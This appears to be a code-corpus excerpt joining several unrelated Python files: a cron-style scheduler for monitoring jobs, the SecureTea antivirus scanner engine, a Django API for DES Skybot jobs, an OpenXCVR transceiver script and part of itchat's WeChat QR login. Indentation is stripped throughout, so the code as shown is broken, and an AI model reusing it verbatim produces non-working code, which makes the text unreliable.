from schedinstances.SQLAggregator import SQLAggregator
from schedinstances.SQLAggregatorCampaign import SQLAggregatorCampaign
from schedinstances.PandaLogsStorageCleanUp import PandaLogsStorageCleanUp
from schedinstances.GrafanaPlots import GrafanaPlots
from schedinstances.DataCarouselPrestageCollector import DataCarouselPrestageCollector
from schedinstances.MLFlowCleanup import MLFlowCleanup
from schedinstances.DataCarouselMails import DataCarouselMails
from settingscron import EXECUTION_CAP_FOR_MAINMENUURLS
from settingscron import LOG_PATH
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
logging.basicConfig(level=logging.DEBUG, filename=LOG_PATH, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mainMenuURLs = TextFileURLs(EXECUTION_CAP_FOR_MAINMENUURLS)
infrequentURLS = TextFileURLs(EXECUTION_CAP_FOR_MAINMENUURLS)
infrequentURLS.setInputFile("infrequenturls.txt")
artPackages = ArtPackages(EXECUTION_CAP_FOR_MAINMENUURLS)
artMails = ArtMails(EXECUTION_CAP_FOR_MAINMENUURLS)
artDevMails = ArtDevMails(EXECUTION_CAP_FOR_MAINMENUURLS)
bigTasks = BigTasks(EXECUTION_CAP_FOR_MAINMENUURLS)
harvester = Harvester(EXECUTION_CAP_FOR_MAINMENUURLS)
grafanaPlots = GrafanaPlots(EXECUTION_CAP_FOR_MAINMENUURLS)
cephCleanUp = PandaLogsStorageCleanUp()
sQLAggregator = SQLAggregator()
sQLAggregatorCampaign = SQLAggregatorCampaign()
stageProgressCollector = DataCarouselPrestageCollector()
mlFlowCleanUp = MLFlowCleanup()
# dataCaruselMails = DataCarouselMails(EXECUTION_CAP_FOR_MAINMENUURLS)
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.daemon = True
job_thread.start()
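# Note on run_threaded: each scheduled job runs in its own daemon thread, so a slow or
# hung job cannot block the scheduler loop at the bottom of this file, and daemon threads
# do not keep the process alive on shutdown.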
schedule.every(10).minutes.do(run_threaded, mainMenuURLs.execute)
schedule.every(10).minutes.do(run_threaded, bigTasks.execute)
schedule.every(10).minutes.do(run_threaded, harvester.execute)
schedule.every(10).minutes.do(run_threaded, artPackages.execute)
schedule.every(1).hours.do(run_threaded, artDevMails.execute)
schedule.every(1).hours.do(run_threaded, sQLAggregator.execute)
schedule.every(1).hours.do(run_threaded, sQLAggregatorCampaign.execute)
schedule.every().hour.at(":05").do(run_threaded, grafanaPlots.execute)
schedule.every(2).hours.do(run_threaded, infrequentURLS.execute)
schedule.every().day.at("20:18").do(run_threaded, cephCleanUp.execute)
schedule.every().day.at("07:00").do(run_threaded, artMails.execute) # UTC
schedule.every().day.at("10:00").do(run_threaded, artMails.execute) # UTC
schedule.every(2).hours.do(run_threaded, stageProgressCollector.execute)
schedule.every(10).minutes.do(run_threaded, mlFlowCleanUp.execute)
# schedule.every(1).hours.do(run_threaded, dataCaruselMails.execute)
while 1:
schedule.run_pending()
time.sleep(1)
"""
Install:
schedule
"""
|
scanner_engine.py
|
# -*- coding: utf-8 -*-
u"""Scanner Engine module for SecureTea AntiVirus.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 4 2019
Version: 1.4
Module: SecureTea
"""
from securetea.lib.antivirus.scanner.hash_scanner import HashScanner
from securetea.lib.antivirus.scanner.yara_scanner import YaraScanner
from securetea.lib.antivirus.scanner.clamav_scanner import ClamAVScanner
from securetea.lib.antivirus.antivirus_logger import AntiVirusLogger
import multiprocessing
import sys
class ScannerEngine(object):
"""ScannerEngine class."""
def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):
"""
Initialize ScannerEngine.
Args:
debug (bool): Log on terminal or not
config_path (str): Configuration JSON file path
vt_api_key (str): VirusTotal API Key
file_list (list): List of files to scan
Raises:
None
Returns:
None
"""
# Initialize logger
self.logger = AntiVirusLogger(
__name__,
debug=debug
)
if config_path is not None:
self._CONFIG_PATH = config_path
else:
self.logger.log(
"Configuration file path not found.",
logtype="error"
)
sys.exit(0)
if file_list:
self.file_list = file_list
else:
# Initialize an empty list
self.file_list = []
# Create HashScanner object
self.hash_scanner = HashScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create YaraScanner object
self.yara_scanner = YaraScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# Create ClamAVScanner object
self.clamd_scanner = ClamAVScanner(debug=debug,
config_path=self._CONFIG_PATH,
file_list=self.file_list,
vt_api_key=vt_api_key)
# List of process in action
self.process_pool = []
def start_scanner_engine(self):
"""
        Start the scanner engine and start scanning
the files using three (3) engines in a multi-processing
environment.
1. Hash Scanner Engine
2. Yara Scanner Engine
3. Clam AV Scanner Engine
Args:
None
Raises:
None
Returns:
None
"""
try:
# Create Hash Scanner process
hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)
# Create Yara Scanner process
yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)
# Create Clam AV Scanner process
clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)
# Add Hash Scanner process to process list
self.process_pool.append(hash_scanner_process)
# Add Yara Scanner process to process list
self.process_pool.append(yara_scanner_process)
# Add Clamd AV process to process list
self.process_pool.append(clamd_scanner_process)
# Start Hash Scanner process
hash_scanner_process.start()
self.logger.log(
"Hash Scanner engine started",
logtype="info"
)
# Start Yara Scanner process
yara_scanner_process.start()
self.logger.log(
"Yara Scanner engine started",
logtype="info"
)
clamd_scanner_process.start()
self.logger.log(
"Clam AV Scanner engine started",
logtype="info"
)
# Complete the process
for process in self.process_pool:
process.join()
return True
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
return True
except Exception as e:
self.logger.log(
"Error occurred: " + str(e),
logtype="error"
)
return True
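# Minimal usage sketch (illustrative only: the config path, API key and file list below
# are hypothetical placeholders, not values shipped with SecureTea).
if __name__ == "__main__":
    engine = ScannerEngine(
        debug=True,
        config_path="/path/to/antivirus_config.json",  # hypothetical path
        vt_api_key=None,
        file_list=["/tmp/suspicious_file.bin"],  # hypothetical file to scan
    )
    # runs the hash, Yara and ClamAV scanners in parallel processes
    engine.start_scanner_engine()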
|
skybot_job.py
|
import json
import os
from datetime import datetime, timedelta
import pandas as pd
from rest_framework import mixins, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from common.dates_interval import get_days_interval
from common.read_csv import csv_to_dataframe
from des.dao import CcdDao, DesSkybotJobResultDao, ExposureDao
from des.models import SkybotJob
from des.serializers import SkybotJobSerializer
from des.skybot.pipeline import DesSkybotPipeline
import numpy as np
from des.summary import SummaryResult
import threading
class SkybotJobViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""
    This endpoint has the Create, Update and Delete methods disabled;
    those operations are the responsibility of the des/skybot pipeline.
    The submit_job endpoint is responsible for starting the pipeline, which runs in the background.
"""
queryset = SkybotJob.objects.all()
serializer_class = SkybotJobSerializer
ordering_fields = ('id', 'status', 'start', 'finish')
ordering = ('-start',)
def estimate_execution_time(self, to_execute):
dao = DesSkybotJobResultDao(pool=False)
se = dao.skybot_estimate()
try:
average_time = se['t_exec_time'] / int(se['total'])
estimated_time = (int(to_execute) * average_time).total_seconds()
        except Exception:
estimated_time = 0
return estimated_time
@action(detail=False, methods=['post'])
def submit_job(self, request, pk=None):
"""
        This endpoint only creates a new record in the Des/Skybot Jobs table.
        The job is created with status idle; a daemon periodically checks
        for jobs in this status and starts processing them.
        Parameters:
            date_initial (datetime): initial date used to select the exposures to be processed.
            date_final (datetime): final date used to select the exposures to be processed.
        Returns:
            job (SkybotJobSerializer): the job that has just been created.
"""
params = request.data
date_initial = params['date_initial']
date_final = params['date_final']
        # Get the user who submitted the job.
owner = self.request.user
        # Add the start-of-day and end-of-day times to the dates
start = datetime.strptime(
date_initial, '%Y-%m-%d').strftime("%Y-%m-%d 00:00:00")
end = datetime.strptime(
date_final, '%Y-%m-%d').strftime("%Y-%m-%d 23:59:59")
        # Total number of exposures not yet executed in the period.
t_exposures = DesSkybotJobResultDao(
pool=False).count_not_exec_by_period(start, end)
        # TODO: these totals should count nights with unexecuted exposures.
        # Get the total number of nights with exposures in the period
t_nights = ExposureDao(
pool=False).count_not_exec_nights_by_period(start, end)
        # Get the total number of CCDs in the period.
        # TODO: these totals should count CCDs with unexecuted exposures.
t_ccds = CcdDao(pool=False).count_not_exec_ccds_by_period(start, end)
        # Time estimate based on the number of exposures to be executed.
estimated_time = self.estimate_execution_time(t_exposures)
        # Create a Skybot Job model
        job = SkybotJob(
            owner=owner,
            date_initial=date_initial,
            date_final=date_final,
            # The job starts with status Idle.
            status=1,
            # Total number of exposures to be executed.
            exposures=t_exposures,
            # Total number of nights with exposures.
            nights=t_nights,
            # Total number of CCDs in the period.
            ccds=t_ccds,
            # Estimated execution time
            estimated_execution_time=timedelta(seconds=estimated_time)
)
job.save()
result = SkybotJobSerializer(job)
return Response(result.data)
@action(detail=True, methods=['post'])
def cancel_job(self, request, pk=None):
"""
        Aborts a Skybot job:
        creates a file with status 'aborted'; the pipeline daemons check this status and cancel the execution.
"""
job = self.get_object()
        # If the job is idle (1) or running (2)
if job.status <= 2:
            # Create a file in the job directory to tell the pipeline it was aborted.
data = dict({
'status': 'aborted',
})
filepath = os.path.join(job.path, 'status.json')
with open(filepath, 'w') as f:
json.dump(data, f)
result = SkybotJobSerializer(job)
return Response(result.data)
@action(detail=True)
def heartbeat(self, request, pk=None):
"""
        This endpoint monitors the progress of a job.
        The job creates two files, request_heartbeat.json and loaddata_heartbeat.json, and keeps saving its progress to them.
        Parameters:
            pk (int): job id.
        Returns:
            result (json): json with two objects, "request" and "loaddata", containing the contents of the progress files.
"""
        # Instance of the SkybotJob model, retrieved by primary key:
        job = self.get_object()
        # DesSkybotPipeline instance
        pipeline = DesSkybotPipeline()
        # Read the request_heartbeat.json file
        request = pipeline.read_request_heartbeat(job.path)
        # Read the loaddata_heartbeat.json file
loaddata = pipeline.read_loaddata_heartbeat(job.path)
return Response({
"request": request,
"loaddata": loaddata,
})
@action(detail=False)
def calc_execution_time(self, request):
"""
        Calculates the estimated execution time for skybot based on the number of exposures to be executed.
        Example: http://localhost/api/des/skybot_job/calc_execution_time/?to_execute=500
        Parameters:
            to_execute (int): number of exposures to be executed.
"""
to_execute = request.query_params.get('to_execute')
estimated_time = self.estimate_execution_time(to_execute)
return Response({
'estimated_time': estimated_time
})
@action(detail=True)
def time_profile(self, request, pk=None):
"""Retorna o Time Profile para um job que já foi concluido.
le os arquivos requests e loaddata que estão no diretório do job,
e retonra um array para cada um deles. no seguinte formato
request: [['exposure', 'start', 'finish',
'positions', 'execution_time'],...]
loaddata: [['exposure', 'start', 'finish',
'positions', 'execution_time'],...]
"""
job = self.get_object()
if job.status != 3:
return Response(dict({
'success': False,
'message': "Time profile is only available for jobs with status completed."
}))
        # DesSkybotPipeline instance
pipeline = DesSkybotPipeline()
        # Read the requests file
df_request = pipeline.read_request_dataframe(job.path)
d_request = df_request.filter(
['exposure', 'start', 'finish', 'positions', 'execution_time'], axis=1).values
a_request = d_request.tolist()
        # Read the loaddata file
l_filepath = pipeline.get_loaddata_dataframe_filepath(job.path)
df_loaddata = pipeline.read_loaddata_dataframe(l_filepath)
d_loaddata = df_loaddata.filter(
['exposure', 'start', 'finish', 'positions', 'execution_time'], axis=1).values
a_loaddata = d_loaddata.tolist()
return Response(dict({
'success': True,
'columns': ['exposure', 'start', 'finish', 'positions', 'execution_time'],
'requests': a_request,
'loaddata': a_loaddata
}))
@action(detail=True)
def nites_success_or_fail(self, request, pk=None):
"""Retorna todas as datas que executaram com sucesso por completo e as que retornaram com no mínimo uma falha, dentro do periodo, que foram executadas pelo skybot.
Exemplo: http://localhost/api/des/skybot_job/11/nites_success_or_fails/
Returns:
[array]: um array com todas as datas do periodo no formato [{date: '2019-01-01', count: 0, executed: 0}]
O atributo executed pode ter 4 valores:
0 - para datas que não tem exposição;
1 - para datas que tem exposição mas não foram executadas;
2 - para datas que tem exposição, foram executadas e finalizaram com sucesso;
3 - para datas que tem exposição, foram executadas e finalizaram com erro.
"""
job = self.get_object()
file_path = os.path.join(job.path, 'results.csv')
job_result = pd.read_csv(file_path, delimiter=';', usecols=[
'date_obs', 'success', 'request_error', 'loaddata_error'])
job_result['date_obs'] = job_result['date_obs'].apply(
lambda x: x.split()[0])
job_result['count'] = 1
        # Sometimes the error property comes back as 0.0 even though there is no error,
        # so we replace it with np.nan here and handle it later
job_result['request_error'] = job_result['request_error'].apply(
lambda x: np.nan if x == 0.0 else x)
job_result['loaddata_error'] = job_result['loaddata_error'].apply(
lambda x: np.nan if x == 0.0 else x)
        # If either the request or the loaddata step failed, set is_success to False; otherwise set it to True
job_result['is_success'] = job_result[['request_error', 'loaddata_error']].apply(
lambda row: True if np.isnan(row['request_error']) and np.isnan(row['loaddata_error']) else False, axis=1)
        job_result = job_result.drop(columns=['request_error', 'loaddata_error'])
job_result['error'] = job_result['is_success'].apply(
lambda x: 0 if x else 1)
# Group by "date_obs" so we know if that day failed or not
df1 = job_result.groupby(by='date_obs', as_index=False).agg(
{'count': 'sum', 'error': 'sum', 'success': 'all', 'is_success': 'all'})
# Function that applies the value of the attributes based on the comparison of 'success' and 'error' properties
def apply_success_value(row):
if row['success'] == True and row['is_success'] == True:
return 2
elif row['success'] == False and row['is_success'] == False:
return 3
else:
return 1
df1['success'] = df1.apply(apply_success_value, axis=1)
        df1 = df1.drop(columns=['is_success'])
start = str(job.date_initial)
end = str(job.date_final)
all_dates = get_days_interval(start, end)
        # Check the number of days between start and end.
if len(all_dates) < 7:
dt_start = datetime.strptime(start, '%Y-%m-%d')
dt_end = dt_start + timedelta(days=6)
all_dates = get_days_interval(dt_start.strftime(
"%Y-%m-%d"), dt_end.strftime("%Y-%m-%d"))
df2 = pd.DataFrame()
df2['date_obs'] = all_dates
df2['success'] = 0
df2['count'] = 0
df2['error'] = 0
df1['date_obs'] = df1['date_obs'].astype(str)
df2['date_obs'] = df2['date_obs'].astype(str)
df1['success'] = df1['success'].astype(int)
df2['success'] = df2['success'].astype(int)
df1['count'] = df1['count'].astype(int)
df2['count'] = df2['count'].astype(int)
df1['error'] = df1['error'].astype(int)
df2['error'] = df2['error'].astype(int)
for i, row in df1.iterrows():
df2.loc[
df2['date_obs'] == row['date_obs'],
['success', 'count']
] = row['success'], row['count']
df = df2.rename(columns={'date_obs': 'date', 'success': 'executed'})
result = df.to_dict('records')
return Response(result)
def run_summary_result(self):
summary_result = SummaryResult()
summary_result.run_by_year()
summary_result.run_by_dynclass()
@action(detail=False)
def test_update_dashboard(self, request, pk=None):
t = threading.Thread(target=self.run_summary_result)
        t.daemon = True  # setDaemon() is deprecated in favor of the daemon attribute
t.start()
return Response({
'success': True,
})
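# Minimal illustration of the execution-time estimate used in estimate_execution_time()
# above (the numbers are made up, not taken from any real Skybot job): the accumulated
# execution time is divided by the number of exposures already processed, then multiplied
# by the number of exposures still to execute.
if False:
    _total_exec_time = timedelta(hours=10)  # hypothetical accumulated execution time
    _total_done = 1200                      # hypothetical exposures already processed
    _to_execute = 300
    _average = _total_exec_time / _total_done
    print((_to_execute * _average).total_seconds())  # -> 9000.0 seconds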
|
transceiver.py
|
#!/usr/bin/env python3
# python modules
import sys
import time
import subprocess
from multiprocessing import Process, Queue
import atexit
import argparse
import logging
# numpy etc
import numpy as np
import matplotlib.pyplot as plt
# open xcvr modules
import openxcvr
from cat_server import cat_server, command_queue, request_queue, response_queue
# A table of the playback sample rates for each mode
sample_rate_for_modes = {
"AM": 12207,
"LSB": 6103,
"USB": 6103,
"FM": 24414,
"NFM": 24414,
"CW": 8138,
}
def convert_16to8(data):
data = np.frombuffer(data, dtype="int16") / 256
return data.astype("int8")
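# Quick illustration (synthetic samples, not radio data): convert_16to8() rescales signed
# 16-bit PCM to signed 8-bit by dividing by 256.
if False:
    _pcm16 = np.array([0, 256, -256, 32767, -32768], dtype="int16").tobytes()
    print(convert_16to8(_pcm16))  # int8 result: [0, 1, -1, 127, -128]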
def terminate_process(p):
"""Quit process nicely at first, then forcefully"""
# try to quit cleanly
p.terminate()
try:
outs, errs = p.communicate(timeout=1)
logging.debug("process exited %s %s", outs, errs)
except subprocess.TimeoutExpired:
        # if that doesn't work, kill it by force
p.kill()
outs, errs = p.communicate()
logging.debug("process killed %s %s", outs, errs)
class Transceiver:
def __init__(self, port, mode, frequency, squelch, agc, server_host, server_port):
xcvr = openxcvr.Xcvr(port)
self.xcvr = xcvr
# keep local copies of settings so we know where we are
if mode is None:
xcvr.request_mode()
self.mode = xcvr.get_mode()
else:
self.mode = mode
if frequency is None:
xcvr.request_frequency()
self.frequency = xcvr.get_frequency()
else:
self.frequency = frequency
self.squelch = squelch
self.agc = agc
self.tx_rx = 0
        # push the initial settings to the transceiver hardware
xcvr.set_frequency(self.frequency)
xcvr.set_mode(self.mode)
xcvr.set_squelch(squelch)
xcvr.set_AGC(agc)
xcvr.set_volume(0)
# start a tcp server listening for cat commands
self.command_queue = command_queue
self.request_queue = request_queue
self.response_queue = response_queue
self.cp = Process(
target=cat_server, args=(frequency, mode, server_host, server_port)
)
self.cp.start()
def receive(self):
"""Read audio a block at a time from the receiver and send to the sound card
        Whenever there is a command that needs to be processed, stop receiving and
process it.
"""
logging.info("transceiver: start receiving")
# request extra packet at start so there is always one ready
self.xcvr.request_audio_output()
while 1:
if not self.command_queue.empty():
break
request = None
if not self.request_queue.empty():
request = self.request_queue.get()
if request == "frequency" :
self.xcvr.request_frequency()
elif request == "mode" :
self.xcvr.request_mode()
elif request == "tx" :
self.xcvr.request_TX()
self.xcvr.request_audio_output()
data = self.xcvr.get_audio()
self.player.stdin.write(data)
if request is not None:
if request == "frequency" :
self.frequency = self.xcvr.get_frequency()
self.response_queue.put(self.frequency)
elif request == "mode" :
mode = self.xcvr.get_mode()
self.response_queue.put(mode)
if mode != self.mode:
self.mode = mode
break
elif request == "tx" :
tx_rx = self.xcvr.get_TX()
self.response_queue.put(tx_rx)
if tx_rx != self.tx_rx:
self.tx_rx = tx_rx
break
# when complete, play the extra packet
data = self.xcvr.get_audio() # process extra request once finished
self.player.stdin.write(data)
logging.info("transceiver: stop receiving")
def transmit(self):
"""Read audio a block at a time from the soundcard and send to the transmitter
Whenever there is a command that needs to be processed, quit transmitting and
process it.
"""
logging.info("transceiver: start transmitting")
self.xcvr.set_USB_audio(1)
self.xcvr.set_TX(1)
self.recorder = subprocess.Popen(
["arecord", "-t", "raw", "--format=S16_LE", "--rate=50000"],
stdout=subprocess.PIPE,
)
t0 = time.time()
samples_sent = 0
#transmit can be jittery to start presumably while buffers are filling up
#adding a bit of silence at the start of each transmission seems to help
silence = b"\x00"*1024
for i in range(20):
self.xcvr.put_audio(silence)
while 1:
if not self.command_queue.empty():
break
#In TX mode, settings can't be changed, so just echo local copies
if not self.request_queue.empty():
request = self.request_queue.get()
if request == "frequency" :
self.response_queue.put(self.frequency)
elif request == "mode" :
self.response_queue.put(self.mode)
elif request == "tx" :
self.response_queue.put(self.tx_rx)
# send a block
data = convert_16to8(self.recorder.stdout.read(1024*2))
#data = np.sin(np.arange(1024)*2.0*np.pi/32)*127
#data = data.astype("int8")
#samples_sent += len(data)
#elapsed = time.time() - t0
#logging.info(samples_sent / elapsed)
self.xcvr.put_audio(data.tobytes())
self.xcvr.set_USB_audio(0)
self.xcvr.set_TX(0)
terminate_process(self.recorder)
logging.info("transceiver: stop transmitting")
def process_commands(self):
"""Sit in a loop processing commands from the cat server.
Whenever we aren't receiving commands, we are either transmitting or receiving
"""
# start out in receive mode
self.player = subprocess.Popen(
[
"aplay",
"-t",
"raw",
"--format=S16_LE",
"--rate=%u" % sample_rate_for_modes[self.mode],
],
stdin=subprocess.PIPE,
)
self.receive()
while 1:
while not self.command_queue.empty():
# pull command from command stream
command, value = self.command_queue.get()
if command == "frequency":
logging.info("transceiver: executing frequency command")
self.frequency = value
self.xcvr.set_frequency(self.frequency)
elif command == "mode":
logging.info("transceiver: executing mode command")
terminate_process(self.player)
self.mode = value
self.xcvr.set_mode(self.mode)
self.player = subprocess.Popen(
[
"aplay",
"-t",
"raw",
"--format=S16_LE",
"--rate=%u" % sample_rate_for_modes[self.mode],
],
stdin=subprocess.PIPE,
)
elif command == "tx":
logging.info("transceiver: executing tx_rx command")
self.tx_rx = int(value)
else:
assert False
if self.tx_rx:
self.transmit()
else:
self.receive()
def __del__(self):
"""Run clean-up of child processes"""
logging.info("transceiver: running clean-up")
if hasattr(self, "cp"):
self.cp.terminate()
if hasattr(self, "player"):
terminate_process(self.player)
if hasattr(self, "recorder"):
terminate_process(self.recorder)
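# Architectural note (summarizing the code above, not adding behaviour): the CAT server
# runs in a separate process and talks to the Transceiver through three shared queues
# imported from cat_server: command_queue carries setting changes (frequency/mode/tx),
# request_queue carries state queries, and response_queue carries the replies;
# receive() and transmit() poll these queues between audio blocks.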
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="OpenXCVR command line transceiver")
parser.add_argument(
"-p",
"--port",
default="/dev/ttyUSB0",
help="USB serial port to connect to OpenXCVR hardware",
)
parser.add_argument(
"-m",
"--mode",
choices=openxcvr.modes.keys(),
help="Mode (AM, FM, NFM, USB, LSB, CW)",
)
parser.add_argument(
"-f", "--frequency", type=float, help="frequency (Hz)"
)
parser.add_argument(
"-s",
"--squelch",
default=0,
type=int,
choices=range(13),
help="squelch (0=s0, 9=s9, 10=s9+10dB, 11=s9+20dB, 12=s9+30dB)",
)
parser.add_argument(
"-a",
"--agc",
default="VERY_SLOW",
choices=openxcvr.agc_speeds.keys(),
help="AGC speed (very slow, slow, normal, fast)",
)
    parser.add_argument(
        "-lh",
        "--server_host",
        default="0.0.0.0",
        help="IP address to bind rigctld compatible server",
    )
    parser.add_argument(
        "-lp",
        "--server_port",
        default=4532,
        type=int,
        help="port to bind rigctld compatible server",
    )
args = parser.parse_args()
logging.basicConfig(format="%(levelname)s:%(message)s", level=logging.INFO)
trx = Transceiver(
args.port,
args.mode,
args.frequency,
args.squelch,
args.agc,
args.server_host,
args.server_port,
)
trx.process_commands()
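    # Example (assumed): with the server running, a Hamlib-compatible client can
    # talk to it over the network, e.g.
    #   rigctl -m 2 -r localhost:4532 f            # read the frequency
    #   rigctl -m 2 -r localhost:4532 F 14200000   # set the frequency to 14.2 MHz
    # (model 2 is Hamlib's NET rigctl backend; adjust host/port to match
    # --server_host/--server_port).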
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from .. import config, utils
from ..returnvalues import ReturnValue
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
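# load_login() installs the functions below as methods on itchat's Core class,
# which is why they take `self`/`core` even though they are defined at module level.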
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive:
logger.warning('itchat has already logged in.')
return
while 1:
for getCount in range(10):
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid(): time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
if qrStorage:
break
elif 9 == getCount:
logger.info('Failed to get QR code, please restart the program.')
sys.exit()
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn: break
logger.info('Log in time out, reloading QR code')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
        logger.info('Logged in successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
url = '%s/qrcode/%s' % (config.BASE_URL, uuid)
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, stream=True, headers=headers)
except:
return False
qrStorage = io.BytesIO(r.content)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
with open(picDir, 'wb') as f: f.write(r.content)
if enableCmdQR:
utils.print_cmd_qr(picDir, enableCmdQR=enableCmdQR)
else:
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % (
        uuid, localTime // 1579, localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data:
return data.group(1)
else:
return '400'
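# (Assumed meaning of the status codes handled in login() above: '200' = login
#  confirmed on the phone, '201' = QR code scanned but not yet confirmed,
#  '408' = not scanned yet / poll timed out, anything else = error.)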
def process_login_info(core, loginContent):
    ''' When login finishes (after the QR code is scanned):
     * syncUrl and fileUploadingUrl are fetched
     * deviceid and msgid are generated
     * skey, wxsid, wxuin and pass_ticket are fetched
    '''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
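# After process_login_info() the loginInfo dict roughly looks like this
# (sketch; values are illustrative, not real credentials):
#   {'url': 'https://wx2.qq.com/cgi-bin/mmwebwx-bin',
#    'fileUrl': 'https://file.wx2.qq.com/cgi-bin/mmwebwx-bin',
#    'syncUrl': 'https://webpush.wx2.qq.com/cgi-bin/mmwebwx-bin',
#    'deviceid': 'e123456789012345',
#    'skey': '...', 'wxsid': '...', 'wxuin': '...', 'pass_ticket': '...',
#    'BaseRequest': {'Skey': '...', 'Sid': '...', 'Uin': '...', 'DeviceID': '...'}}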
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = utils.struct_friend_info(dic['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
